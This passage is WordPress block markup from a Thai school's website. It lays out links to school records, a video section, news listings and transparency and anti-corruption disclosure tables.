data-id=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_41d84f-8e\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_41d84f-8e\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\">กรรมการสถานศึกษา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_17cef9-da\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_17cef9-da\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_a997a3-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_a997a3-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1KNY_0cfvU0tSAr568ZHSWspTl7t86-R6/view?usp=sharing\" data-type=\"page\" data-id=\"19\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_13660f-b9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_13660f-b9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=sharing\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_702c0e-e7\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_702c0e-e7\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1u06_5GP1uT_R9axW6_ASul5adIiVXpDR/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1u06_5GP1uT_R9axW6_ASul5adIiVXpDR/view?usp=sharing\">ข้อมูล O-NET</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_0109ca-f6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_0109ca-f6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">แบบวัดการรับรู้ EIT 2</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_b4c32e-bd\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_b4c32e-bd\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-200\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/EIT_QRCode-1.png\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://www.facebook.com/profile.php?id=61556083436494&amp;sk=videos\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:video {\"id\":64,\"align\":\"center\"} -->\n<figure class=\"wp-block-video aligncenter\"><video controls poster=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/VTR-แนะนำโรงเรียน.png\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/วันครู-1.mp4\"></video></figure>\n<!-- /wp:video --></div>\n<!-- /wp:group -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"abc6c06d\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} /-->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><code><a href=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\" data-type=\"link\" data-id=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\">Q&amp;A</a></code></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</strong></td></tr><tr><td><strong>รายงานผลการดำเนินงานประจำปี</strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong>คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\">ข้อมูลเชิงสถิติการให้บริการ</a></strong></td></tr><tr><td><strong><a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">E-Service</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการบริหารและพัฒนาทรัพยากรบุคคล</strong></td></tr><tr><td><strong>รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong>ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong>ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</a></strong></td></tr><tr><td><strong>การเปิดโอกาสให้เกิดการมีส่วนร่วม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://www.facebook.com/share/p/sdXD4yi68yYAMbpR/\" data-type=\"link\" data-id=\"https://www.facebook.com/share/p/sdXD4yi68yYAMbpR/\">ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></strong></td></tr><tr><td><strong>การสร้างวัฒนธรรม&nbsp; No Gift Policy</strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\">การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</a></strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"76fbe2ef\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_91838d-0f\",\"columns\":[1,1,1,1,1,1],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่